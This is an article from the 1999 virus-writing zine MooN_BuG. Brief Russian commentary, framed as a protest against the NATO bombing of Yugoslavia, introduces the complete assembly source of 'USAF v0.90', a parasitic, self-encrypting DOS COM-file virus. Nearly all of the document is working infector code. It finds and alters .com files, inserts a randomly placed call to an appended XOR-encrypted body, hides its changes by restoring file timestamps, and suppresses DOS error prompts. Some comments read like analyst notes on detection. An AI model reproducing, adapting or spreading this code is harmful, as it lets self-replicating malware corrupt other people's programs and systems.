[TulaAnti&ViralClub] PRESENTS ...
MooN_BuG, Issue 10, Apr 1999 file 007
-* Just virus, United States Air Force version 0.90 (BETA) *-
Copy-ya-right (c) March 1999, Mongoose of -=MY=-
Представляя этот вирус вам, я поступаю против своих принципов и принципов
группы Misdirected Youth, т.к. этот журнал и вирус сразу же после выпуска по-
падет в руки аверов. Хотя этот вирус показывает, что я думаю о бомбежке Югос-
лавии. Но этот вирус также может помочь вирмейкерам разобраться с шифровкой.
Комментарии как всегда на английском языке. =))
Метод заражения вируса USAF v0.90:
┌──────┐
┌─>│ JUMP │─┐ Джамп на пятно (JMP SPOT + INFECTION MARKER)
│ │ XXXX │ │
│┌─│ SPOT │<┘ Пятно, оно представляет из себя CALL CODE (переход к телу
││ │ XXXX │ вируса) + 6 байт "мусора"
││ ├──────┤
│└>│ CODE │ Собственно тело вируса, делает дела, восстанавливает байты
└──└──────┘ под пятном и на 100h, затем передает управление на 100h
─────[USAF.ASM]──────[START]──────────────────────────────────────────────────
;┌───────────────────────────────────────────────────────────────────────────┐
;│ USAF version 0.90 (BETA) [C] Mongoose of Misdirected Youth, March '99 │
;├───────────────────────────────────────────────────────────────────────────┤
;│ Virii Type: COM.CRYPT.VIRUS (parasitic) │
;│ Stealth: Save date, time & attributes │
;│ Error Handler: Yep │
;│ Virii Size: 618 │
;│ Need to compile: Compile with one pass │
;└───────────────────────────────────────────────────────────────────────────┘
.model tiny
.code
org 100h ; COM image: everything is addressed from 100h
spot_length equ 9 ; Spot length: 3-byte CALL + 6 filler bytes
;---------------------------------------------------------------------------
; Entry point and main infection loop. Analyst notes (detection/cleanup):
;  - The delta offset lives in BP for the whole body; every data access is
;    [bp+label]. A first-generation run enters at START with BP=0.
;  - In an infected host, file offset 0 holds JMP (0E9h) to the spot and
;    offset 3 holds the marker byte 5 (checked below at original_bytes+3).
;  - Hosts smaller than 1000 or larger than 64000 bytes are skipped, as are
;    files starting with 'MZ'.
;  - ORIGINAL..STRING is stored XOR-encrypted in the host; the decryptor at
;    REAL_START stays plaintext with its key/offset immediates patched in.
;---------------------------------------------------------------------------
start: sub bp,bp ; First generation: delta offset = 0
jmp restore_orig ; First generation has no spot or encrypted region to undo
real_start: mov dx,0 ; Key to decrypt code (immediate patched at infect time)
code_offset: mov bx,0 ; Code offset (immediate patched at infect time)
mov cx,(string-original) ; Size of the encrypted region
decrypt_cycle: xor byte ptr [bx],dl ; Two-step XOR: low byte of key ...
inc dx ; ... key advances by one per byte ...
xor byte ptr [bx],dh ; ... then high byte of the advanced key
inc bx
loop decrypt_cycle
original: pop di ; Return address pushed by the CALL in the spot (= spot+3)
sub di,3 ; di = load address of the spot
call calculate_ip ; Push current IP to derive the delta offset
calculate_ip: pop si ; si = run-time address of calculate_ip
xchg bp,si
sub bp,offset calculate_ip ; bp = run-time address - assembled address
restore_spot: lea si,[bp+spot] ; Put the 9 saved host bytes back under the spot
mov cx,spot_length
cld
rep movsb
restore_orig: mov di,100h ; Put the 4 saved host bytes back at 100h
lea si,[bp+original_bytes]
movsw
movsw
set_seed: in ax,40h ; Generate seed for RNG from timer port 40h
mov word ptr [bp+seed],ax ; Put seed
set_new_dta: mov ah,1ah ; Set new DTA (inside the virus body, see heap)
lea dx,[bp+dta]
int 21h
mov ax,3524h ; Get orig Int 24h (critical-error handler)
int 21h
mov word ptr [bp+old_int24],bx
mov word ptr [bp+old_int24+2],es
mov ax,2524h ; Set new handler: suppresses the DOS critical-error prompt
lea dx,[bp+new_int24]
int 21h
push cs
pop es ; Restore ES=CS (INT 21h/35h returned the handler segment in ES)
find_first: mov ah,4eh ; Find first COM-file in the current directory
mov cx,7 ; Attribute mask: also match read-only, hidden, system
lea dx,[bp+file_mask] ; File mask '*.com'
find_next: int 21h
jnc get_attrib ; Jump if okey
jmp return_control ; No (more) files: hand control to the host
get_attrib: mov ax,4300h ; Get attributes
lea dx,[bp+dta+1eh] ; Filename in the DTA (offset 1eh)
int 21h
mov word ptr [bp+attribs],cx ; Save attributes (restored at close_file)
mov ax,4301h ; Clear attributes so read-only hosts can be opened
sub cx,cx
lea dx,[bp+dta+1eh]
int 21h
open_file: mov ax,3d02h ; Open for read'n'write
lea dx,[bp+dta+1eh] ; Filename
int 21h
jc close_file ; Jump if error
xchg bx,ax ; Move file handle to BX
mov ax,5700h ; Get file date and time
int 21h
mov word ptr [bp+time],cx ; Save time (restored at close_file: the "stealth")
mov word ptr [bp+date],dx ; Save date
mov cx,word ptr [bp+dta+1ah] ; File size (DTA offset 1ah, low word)
cmp cx,1000 ; Check file size: skip hosts below 1000 ...
jb close_file
cmp cx,64000 ; ... or above 64000 bytes
ja close_file
mov ah,3fh ; Read first 4 bytes
mov cx,4
lea dx,[bp+original_bytes]
int 21h
cmp byte ptr [bp+original_bytes+3],5 ; Infection marker (written by infect)
jz close_file ; Jump if infected
cmp word ptr [bp+original_bytes],'ZM' ; 'MZ' header: an EXE named .COM
jz close_file ; Jump if EXE
again: mov cx,word ptr [bp+dta+1ah] ; File size
sub cx,100
call get_rnd_number ; Get rnd number from 0 to CX-1
cmp ax,100
jb again ; Retry while the value is below 100
call make_spot ; Make spot; make_spot falls through into infect
close_file: mov ax,5701h ; Restore orig date and time
lea cx,[bp+time]
lea dx,[bp+date]
int 21h
mov ah,3eh ; Close file
int 21h
mov ax,4301h ; Restore file attributes
mov cx,[bp+attribs]
lea dx,[bp+dta+1eh]
int 21h
mov ah,4fh ; Find next file
jmp find_next
db 'А ты бомбил Югославию?',0 ; Text payload strings (never executed)
db 'Help NATO, before it''s not too late!'
return_control:mov ax,2524h ; Restore old int 24 handler
lea dx,[bp+old_int24]
int 21h
push cs
pop ds
mov ah,1ah ; Restore DTA to the default PSP location (80h)
mov dx,80h
int 21h
mov ax,100h ; Jump to 100h (file begin), now holding the host's bytes
jmp ax
db 'USAF by Mongoose / Misdirected Youth' ; Signature text (never executed)
;┌────────────────────────────────────────────────────────────────────────────
;│ Generate'n'write SPOT
;└────────────────────────────────────────────────────────────────────────────
;---------------------------------------------------------------------------
; make_spot / infect: writes three things into the open host (handle in BX):
;  1. the 9-byte spot at file offset SI: a CALL to the appended body plus
;     filler (the host bytes under it are saved first);
;  2. a JMP to the spot plus marker byte 5 at file offset 0;
;  3. the body at end of file, with ORIGINAL..STRING XOR-encrypted and the
;     decryptor's key/offset immediates patched for this host.
; Clobbers AX, CX, DX, SI, DI, flags.
;---------------------------------------------------------------------------
make_spot: mov ax,4200h ; Seek to spot location (SI = file offset of spot)
sub cx,cx
mov dx,si
push cx dx ; Keep the seek position for the rewrite below
int 21h
mov ah,3fh ; Read bytes "under spot" (put back at run time by restore_spot)
mov cx,spot_length ; Spot length
lea dx,[bp+spot] ; Buffer to save bytes
int 21h
mov cx,word ptr [bp+dta+1ah] ; Generate spot: CALL rel16 = filesize - spot - 3
sub cx,si ; (target = old end of file, where the body is appended)
sub cx,3
mov word ptr [bp+spot_buf+1],cx
mov byte ptr [bp+spot_buf],0e8h ; CALL opcode
mov word ptr [bp+spot_buf+3],di ; Filler word; rest of spot_buf is left as-is
mov ax,4200h ; Seek back to spot location
pop dx cx
int 21h
mov ah,40h ; Write spot
mov cx,spot_length ; Spot length
lea dx,[bp+spot_buf]
int 21h
;┌────────────────────────────────────────────────────────────────────────────
;│ Infect file
;└────────────────────────────────────────────────────────────────────────────
infect: mov cx,si ; JMP rel16 from 100h to the spot = spot - 3
sub cx,3
mov word ptr [bp+buffer+1],cx; Spot location
mov byte ptr [bp+buffer],0e9h; JMP instruction
mov byte ptr [bp+buffer+3],5 ; Infection marker (tested before infecting)
mov ax,4200h ; Seek to file offset 0
sub cx,cx
cwd ; dx = 0 (ax is positive here)
int 21h
mov ah,40h ; Write JMP + marker (4 bytes)
mov cx,4
lea dx,[bp+buffer]
int 21h
mov ax,4202h ; Move pointer to end of file
sub cx,cx
cwd
int 21h
in ax,40h ; Key to decrypt code: timer value becomes the RNG bound ...
xchg cx,ax
call get_rnd_number ; ... and the key is a random value in 0..CX-1
mov word ptr [bp+real_start+1],ax ; Patch the key immediate in the decryptor
mov cx,word ptr [bp+dta+1ah] ; Crypted code location in file
add cx,(original-real_start)+100h ; = load address of ORIGINAL inside the host
mov word ptr [bp+code_offset+1],cx ; Patch the offset immediate in the decryptor
lea di,[bp+xor_buffer] ; Copy the body to a scratch buffer; encrypt the copy
lea si,[bp+real_start]
mov cx,(end_of_code-real_start)
push di ; Save code location
cld
rep movsb
pop di ; Restore code location
add di,(original-real_start) ; Only ORIGINAL..STRING is encrypted
mov cx,(string-original)
crypt_cycle: xor byte ptr [di],al ; Mirror of decrypt_cycle, key in AX
inc ax
xor byte ptr [di],ah
inc di
loop crypt_cycle
mov ah,40h ; Append the encrypted body to the host
mov cx,(end_of_code-real_start)
lea dx,[bp+xor_buffer]
int 21h
ret
;┌────────────────────────────────────────────────────────────────────────────
;│ New int 24 handler
;└────────────────────────────────────────────────────────────────────────────
;---------------------------------------------------------------------------
; Replacement INT 24h (critical error) handler. Returns AL=3 = "fail the
; call", so write-protected or faulty media yield an error return to the
; caller instead of the DOS "Abort, Retry, Fail?" prompt — the user sees
; nothing. Installed in the main loop, removed at return_control.
;---------------------------------------------------------------------------
new_int24: mov al,3
iret
;┌─────────────────────────┬──────────────────────────────────────────────────
;│ Random number generator │ Generate random number from 0 to CX
;└─────────────────────────┴──────────────────────────────────────────────────
;---------------------------------------------------------------------------
; get_rnd_number: AX = pseudo-random value in 0..CX-1.
; Multiplicative congruential generator: seed = (seed*261) mod 65521; a zero
; result is rejected by bumping the seed and retrying. Not cryptographic —
; it only picks the spot offset and the XOR key (see main loop / infect).
; In:  CX = modulus; [bp+seed] = state.  Out: AX; [bp+seed] updated.
; Preserves BX, CX (pushed/popped); clobbers DX, flags.
;---------------------------------------------------------------------------
get_rnd_number:push bx cx
mov ax,[bp+seed]
mov bx,261
mul bx ; dx:ax = seed * 261
mov bx,65521
div bx ; dx = (seed * 261) mod 65521
or dx,dx
jnz okey
inc word ptr [bp+seed] ; Zero result: perturb the seed and retry
jmp get_rnd_number
okey: mov word ptr [bp+seed],dx ; Store new seed
mov ax,dx
sub dx,dx ; dx:ax / cx
div cx
mov ax,dx ; Remainder is the result (0..CX-1)
pop cx bx
ret
;┌────────────────────────────────────────────────────────────────────────────
;│ DATA
;└────────────────────────────────────────────────────────────────────────────
file_mask db '*.com',0 ; Search mask for FindFirst (ASCIIZ)
spot db 9 dup (?) ; Host bytes saved from under the spot (spot_length)
original_bytes db 0cdh,20h,?,? ; Host's first 4 bytes; 1st generation: INT 20h
string db 'Misdirected Youth' ; Last bytes of the encrypted region
end_of_code label byte ; End of the part that is written to hosts
;┌────────────────────────────────────────────────────────────────────────────
;│ HEAP
;└────────────────────────────────────────────────────────────────────────────
; Scratch area: not written to hosts (only real_start..end_of_code is),
; so it exists only in memory after the host image is loaded.
dta db 43 dup (?) ; Temporary DTA (filename at +1eh, file size at +1ah)
seed dw ? ; Seed for RNG
date dw ? ; Saved host date
time dw ? ; Saved host time
buffer db 4 dup (?) ; JMP + marker image written to host offset 0
attribs dw ? ; Saved host attributes
spot_buf db spot_length dup (?) ; Spot image written to the host
old_int24 dd ? ; Old Int 24 handler
xor_buffer db (end_of_code-real_start) dup (?) ; Encrypted copy of the body
end start
─────[USAF.ASM]──────[EOF]─────────────────────────────────────────────────────
Copy-ya-right (c) March 1999, Mongoose of -=MY=-